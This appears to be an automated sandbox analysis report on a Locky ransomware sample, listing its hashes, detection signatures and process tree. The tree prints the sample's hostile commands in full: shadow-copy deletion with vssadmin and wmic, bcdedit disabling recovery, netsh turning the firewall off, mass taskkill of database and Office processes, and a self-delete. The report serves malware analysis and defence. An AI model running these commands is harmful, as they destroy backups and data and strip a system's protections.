Analysis
- max time kernel: 91s
- max time network: 96s
- platform: windows10-2004_x64
- resource: win10v2004-20231020-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231020-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29-10-2023 19:07

Static task: static1
Behavioral task: behavioral1
- Sample: b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
- Resource: win10v2004-20231020-en
General
- Target: b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
- Size: 169KB
- MD5: 98562209465bec53327e65649a2b8829
- SHA1: 3a47656ed3df213bd934aa01078a863568fe9f2b
- SHA256: b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe
- SHA512: c11ce14f9cb75df2bc9bd81971c1f8fa885815715f389eb8e796e0f657de59756b36a6f896c216a03c7be7bb3ddff9b8a47aee71146760e4f4d9c6bdc0ff2cc3
- SSDEEP: 3072:iFgiMd04bHHr/QFDtaruNyXgs7WL61fXbEiVkYELY2P+gA/PF:UE3bHL/ngsu61kYELNmhF
Malware Config
- Extracted: C:\Users\Admin\Music\!!Read_Me.CBF5C.html
Signatures
- Locky
  Ransomware strain released in 2016, with advanced features like anti-analysis.
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 4656), bcdedit.exe (PID 4692)
- Renames multiple (164) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
- Modifies Windows Firewall (1 TTP, 1 IoC)
- Drops file in Program Files directory (1 IoC)
  Process: b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
  IoC: File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Configuration\configuration.sqlite
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 4780)
- Kills process with taskkill (13 IoCs)
  Processes: taskkill.exe (PIDs 3988, 1264, 4684, 1588, 1912, 224, 1352, 3492, 1084, 3540, 1856, 3068, 4024)
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe (PID 4204), two occurrences
- Suspicious use of AdjustPrivilegeToken (58 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
Each entry gives the image path, the command line, the PID and the signatures triggered by that process; [n] and indentation give the depth in the process tree.

[1] C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe"
    PID: 4204
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd.exe /c vssadmin delete shadows /all /quiet
      PID: 2812
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin delete shadows /all /quiet
        PID: 4780
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd.exe /c wmic shadowcopy delete /nointeractive
      PID: 260
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic shadowcopy delete /nointeractive
        PID: 5008
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      PID: 4276
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\bcdedit.exe
        Command line: bcdedit /set {current} bootstatuspolicy ignoreallfailures
        PID: 4656
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd.exe /c bcdedit /set {current} recoveryenabled no
      PID: 3684
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\bcdedit.exe
        Command line: bcdedit /set {current} recoveryenabled no
        PID: 4692
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd.exe /c netsh advfirewall set allprofiles state off
      PID: 1064
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall set allprofiles state off
        PID: 4664
        - Modifies Windows Firewall
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im mys*
      PID: 2112
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im mys*
        PID: 1856
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im post*
      PID: 3584
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im post*
        PID: 4684
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im vee*
      PID: 3368
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im vee*
        PID: 3540
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im python*
      PID: 3828
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im python*
        PID: 1084
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im java*
      PID: 3816
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im java*
        PID: 3068
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im apache*
      PID: 2376
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im apache*
        PID: 1264
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im tomcat*
      PID: 976
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im tomcat*
        PID: 1588
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im sql*
      PID: 1872
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im sql*
        PID: 4024
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im Exchange*
      PID: 4788
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im Exchange*
        PID: 3492
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im excel*
      PID: 3352
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im excel*
        PID: 1352
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im winword*
      PID: 4356
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im winword*
        PID: 224
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im powerpnt*
      PID: 1184
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im powerpnt*
        PID: 1912
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im note*
      PID: 4696
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im note*
        PID: 3988
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
      PID: 5668
    [3] C:\Windows\SysWOW64\PING.EXE
        Command line: ping 127.0.0.1
        PID: 5712
        - Runs ping.exe

[1] C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    PID: 1468
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\Music\!!Read_Me.CBF5C.html
  Filesize: 4KB
  MD5: 4f72901ab4e11b9835d9055f2ec1418e
  SHA1: 68f8bbf133682edab9c0d47d0c4c9163e84802ed
  SHA256: 854cd078b76f87f92a9f63e1d79852e4abab5fd03df0d40981c5847973083f66
  SHA512: 55dfc457e2f4fdd644ef7c3165e9a71cb86feaf79c07c2cf5ed60599cbf18d5cdc2a2d24fad4d1a09c7d796f3ef1e16e633e42532688afa79daed362c72a4df5
- memory/4204-0-0x0000000010000000-0x000000001001C000-memory.dmp
  Filesize: 112KB